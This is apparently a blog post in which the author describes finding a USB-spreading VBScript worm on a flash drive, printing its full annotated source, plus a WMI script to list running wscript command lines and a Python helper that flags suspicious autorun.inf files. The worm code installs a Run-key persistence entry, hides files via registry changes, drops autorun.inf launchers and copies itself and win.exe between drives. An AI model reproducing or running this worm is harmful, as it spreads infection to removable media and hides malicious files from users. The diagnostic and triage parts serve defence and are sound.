VB Script: How to create a virus?
For quite a few weeks my PC had been slow, and eventually it was crying out for a restart. I turned off all of the Windows services I could, removed all unnecessary software and even some necessary software that I used rarely. Still to no avail. Then I went through my registry to clean up unwanted Run and RunOnce entries.
As I turned on the computer I could see a lot of wscript.exe processes running, tens of them, hogging my CPU and memory. I thought it might be a network policy imposed by the network department, and I used to close the running scripts one by one. But a talk with the network admin eventually revealed that no policy "runs" on a PC at start-up, and that the wscript.exe scripts had nothing to do with them.
Running Symantec Endpoint Protection with up-to-date virus definitions, I could not imagine a virus on my PC.
Most people think that WScript.exe is a virus, which it is not: it is the Windows Script Host (WSH). I have used WScript quite a few times myself, which is probably the reason I never thought of removing that executable.
It can, however, execute commands (VBScript or JScript) that you may not want.
Following is a simple example taken from MSDN that writes to the registry.
Dim WshShell, bKey
Set WshShell = WScript.CreateObject("WScript.Shell")
' Create a key and a value under HKCU
WshShell.RegWrite "HKCU\Software\ACME\FortuneTeller\", 1, "REG_BINARY"
WshShell.RegWrite "HKCU\Software\ACME\FortuneTeller\MindReader", "Goocher!", "REG_SZ"
' Read them back
bKey = WshShell.RegRead("HKCU\Software\ACME\FortuneTeller\")
WScript.Echo WshShell.RegRead("HKCU\Software\ACME\FortuneTeller\MindReader")
' Clean up: delete the value, then the keys
WshShell.RegDelete "HKCU\Software\ACME\FortuneTeller\MindReader"
WshShell.RegDelete "HKCU\Software\ACME\FortuneTeller\"
WshShell.RegDelete "HKCU\Software\ACME\"
So, long story short, this always used to happen when I inserted my flash drive into the system. A couple of days ago I cancelled the Action window that pops up when you insert a flash drive, browsed the drive using Control+E (Windows Explorer) and, to my astonishment, found a .VBS file, which is a VBScript file. I renamed the file and opened it. It was the code that was hogging my PC!
Though I did not like the slow PC at all, because I couldn't work, I did enjoy reading the code (0:
Following is what I found when I opened the d.vbs file; I have added a couple of comments to help the reader understand the code.
On Error Resume Next                       'causes execution to continue with the next statement
set objfso=CreateObject("Scripting.fileSystemObject"
Set ws = CreateObject("wscript.Shell")     ' Create a shell object
Set sh = CreateObject("Shell.application")
sour="C:\Tempe"                            ' Folder on the hard disk where the worm keeps its copy
if objfso.FolderEXists(sour) Then          ' Look for a folder
    set tf =objfso.getFolder(sour)
    tf.Attributes=39                       ' 39 = ReadOnly + Hidden + System + Archive
End If
a=0
b=10
c=10
'Tweaking the registry: persist through the Run key and keep hidden/system files out of Explorer
ws.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Explorer", sour & "\" &"d.vbs"
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden",1,"REG_DWORD"
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD"
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden","1"
if a=0 Then
    if objfso.FileExists("C:\Tempe\win.exe") Then
        ws.Run("C:\Tempe\win.exe")
    end if
end if
Do                                         ' Main loop: rescans all drives every 10 seconds, forever
    For Each flashdrive In objfso.drives
        ' drivetype 1 = removable, 2 = fixed; the floppy drive A: is skipped
        If (flashdrive.drivetype = 1 Or flashdrive.drivetype = 2) And flashdrive.Path<>"A:" Then
            If (flashdrive.drivetype = 1) Then
                pet=flashdrive.path & "\"
                ' Drop an autorun.inf on the removable drive that launches d.vbs when the drive is opened
                set tf=objfso.createtextfile(pet & "autorun.inf")
                tf.writeline "[autorun]"
                tf.writeline "shellexecute=wscript.exe d.vbs"
                tf.writeline "shell=Open"
                tf.writeline "Shell\Open\Command=wscript.exe d.vbs"
                tf.writeline "Action=Open to View Folder"
                tf.writeline "Icon=tere.ico"
                tf.close
                set tf =objfso.getfile(pet & "autorun.inf")
                tf.Attributes=39
                if objfso.FileExists(pet&"autorun.inf") Then
                    set f = objfso.getfile(pet&"autorun.inf")
                    size = f.size
                    set text=f.openastextstream(1,-2)
                    do while not text.atendofstream
                        source=source&text.readline
                        source=source & vbcrlf
                    loop
                end if
                if tf=source Then
                    sour="C:\Tempe"
                Else
                    set f = objfso.getfile(pet&"autorun.inf")
                    objfso.DeleteFile(f)
                End If
                If a=0 Then
                    ws.Run(pet)
                    ws.run(pet&"win.exe")
                End If
                a=a+1
                sour="C:\Tempe"
                pet=flashdrive.path & "\"
                dest=flashdrive.path & "\Tempe"
                sours="C:\Tempe\"
                if a=3 Then
                    ' Every third pass, rewrite the autorun.inf from scratch
                    If objfso.FileExists(pet&"autorun.inf") Then
                        objfso.DeleteFile(pet&"autorun.inf")
                        set Fol=objfso.GetFolder(sour)
                        set tf=objfso.createtextfile(pet & "autorun.inf")
                        tf.writeline "[autorun]"
                        tf.writeline "shellexecute=wscript.exe d.vbs"
                        tf.writeline "shell=Open"
                        tf.writeline "Shell\Open\Command=wscript.exe d.vbs"
                        tf.writeline "Action=Open to View Folder"
                        tf.writeline "Icon=tere.ico"
                        tf.close
                        set tf =objfso.getfile(pet & "autorun.inf")
                        tf.Attributes=39
                    End If
                End If
                ' Copy the worm (d.vbs, win.exe, tere.ico) from C:\Tempe to the flash drive if it is not there yet
                If objfso.FileExists(pet&"d.vbs") Then
                    sour="C:\Tempe"
                Else
                    set Fol=objfso.GetFolder(sour)
                    set f=objfso.GetFile(Fol&"\d.vbs")
                    objfso.CopyFile f, pet, OverWriteFiles
                    set f =objfso.getfile(pet & "d.vbs")
                    f.Attributes=39
                    set f=objfso.GetFile(Fol&"\win.exe")
                    objfso.CopyFile f, pet, OverWriteFiles
                    set f =objfso.getfile(pet & "win.exe")
                    f.Attributes=39
                    set f=objfso.GetFile(Fol&"\tere.ico")
                    objfso.CopyFile f, pet, OverWriteFiles
                    set f =objfso.getfile(pet & "tere.ico")
                    f.Attributes=39
                    set tf=objfso.createtextfile(pet & "autorun.inf")
                    tf.writeline "[autorun]"
                    tf.writeline "shellexecute=wscript.exe d.vbs"
                    tf.writeline "shell=Open"
                    tf.writeline "Shell\Open\Command=wscript.exe d.vbs"
                    tf.writeline "Action=Open to View Folder"
                    tf.writeline "Icon=tere.ico"
                    tf.close
                    set tf =objfso.getfile(pet & "autorun.inf")
                    tf.Attributes=39
                    set mf = objfso.getfile(pet&"autorun.inf")
                    size = mf.size
                    set text=mf.openastextstream(1,-2)
                    do while not text.atendofstream
                        source=source&text.readline
                        source=source & vbcrlf
                    loop
                End If
                If objfso.FolderExists (sour) Then
                    set Fol=objfso.GetFolder(sour)
                End If
                ' The other direction: copy the worm from the flash drive to C:\Tempe if the PC is not infected yet
                If objfso.FileExists("C:\Tempe\d.vbs") Then
                    sour="C:\Tempe"
                Else
                    set tf=objfso.createFolder("C:\"& "Tempe")
                    set Fol=objfso.GetFolder(sour)
                    Fol.Attributes=39
                    set f=objfso.GetFile(pet&"d.vbs")
                    objfso.CopyFile f, sours, OverWriteFiles
                    set f =objfso.getfile(sour & "\d.vbs")
                    f.Attributes=39
                    set f=objfso.GetFile(pet&"tere.ico")
                    objfso.CopyFile f, sours, OverWriteFiles
                    set f =objfso.getfile(sour & "\tere.ico")
                    f.Attributes=39
                    set f=objfso.GetFile(pet&"win.exe")
                    objfso.CopyFile f, sours, OverWriteFiles
                    set f =objfso.getfile(sour & "\win.exe")
                    f.Attributes=39
                End If
                set mf = objfso.getfile(pet&"autorun.inf")
                size = mf.size
                set text=mf.openastextstream(1,-2)
                do while not text.atendofstream
                    source=source&text.readline
                    source=source & vbcrlf
                loop
                if a=3 Then
                    a=1
                End If
            End If
        End If
    Next
    if check<>1 Then
        Wscript.sleep 10000
    end if
    ' Re-read its own source file on every pass; "check" is never set, so the loop never ends
    set mf = objfso.getfile(Wscript.ScriptFullname)
    size = mf.size
    set text=mf.openastextstream(1,-2)
    do while not text.atendofstream
        source=source&text.readline
        source=source & vbcrlf
    loop
Loop While (check <> 1)
Happy diagnosing the virus! (0:
NOTE:
If you see a lot of wscript.exe processes running on your machine and you doubt what they are doing, copy and paste the following code into a file named Check for virus.VBS and double-click it to run it.
The following code prints, in a message box, the command line of every script being run under the wscript.exe program (the query also covers cscript.exe).
strComputer = "."
' Connect to WMI on the local machine
Set objWMIService = GetObject("winmgmts:" _
    & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
' Find every running script host process
Set colItems = objWMIService.ExecQuery _
    ("Select * from Win32_Process Where Name = 'cscript.exe'" & _
    " OR Name = 'wscript.exe'")
' Show the command line of each one (this tells you which script it is running)
For Each objItem in colItems
    Wscript.Echo objItem.CommandLine
Next
Keep pressing the OK button to step through the list of scripts being run under wscript.exe, one command line per message box.
Enjoy!
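The worm above spreads by dropping an autorun.inf whose launch keys point at wscript.exe, and it marks its files with attribute value 39. Here is an added triage helper (my own example, not code from the post) that parses an autorun.inf from a flash drive, flags launch keys that invoke a script host, and decodes that FSO attribute bitmask; the sample autorun.inf text is constructed to match what d.vbs writes.

```python
from configparser import ConfigParser, Error as IniError

# Attribute bits as used by Scripting.FileSystemObject (File.Attributes); 39 = 1 + 2 + 4 + 32
FSO_ATTRIBUTES = {1: "ReadOnly", 2: "Hidden", 4: "System", 32: "Archive"}

# autorun.inf keys that can start a program when the drive is opened or double-clicked
LAUNCH_KEYS = ("open", "shellexecute", "shell\\open\\command")
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")

# Constructed sample: the autorun.inf that d.vbs writes to the root of a removable drive
SAMPLE_AUTORUN = r"""[autorun]
shellexecute=wscript.exe d.vbs
shell=Open
Shell\Open\Command=wscript.exe d.vbs
Action=Open to View Folder
Icon=tere.ico
"""


def decode_attributes(value: int) -> list:
    """Expand an FSO attribute bitmask (e.g. 39) into its flag names."""
    return [name for bit, name in sorted(FSO_ATTRIBUTES.items()) if value & bit]


def triage_autorun(text: str) -> dict:
    """Parse autorun.inf text; report every launch key and whether it runs a script host."""
    parser = ConfigParser(interpolation=None, strict=False)  # keys are lower-cased by default
    try:
        parser.read_string(text)
    except IniError:
        return {"parsed": False, "launchers": [], "suspicious": False}
    launchers = []
    if parser.has_section("autorun"):
        for key, val in parser.items("autorun"):
            if key not in LAUNCH_KEYS:
                continue
            command = val.strip()
            exe = command.split()[0].lower() if command else ""
            launchers.append({"key": key, "command": command,
                              "script_host": exe.endswith(SCRIPT_HOSTS)})
    return {"parsed": True, "launchers": launchers,
            "suspicious": any(item["script_host"] for item in launchers)}


if __name__ == "__main__":
    report = triage_autorun(SAMPLE_AUTORUN)
    for item in report["launchers"]:
        print(f'{item["key"]} -> {item["command"]}  script host: {item["script_host"]}')
    print("attributes 39 =", "+".join(decode_attributes(39)))
```

A benign autorun.inf that only sets an icon or label yields no launchers, so the report is not flagged.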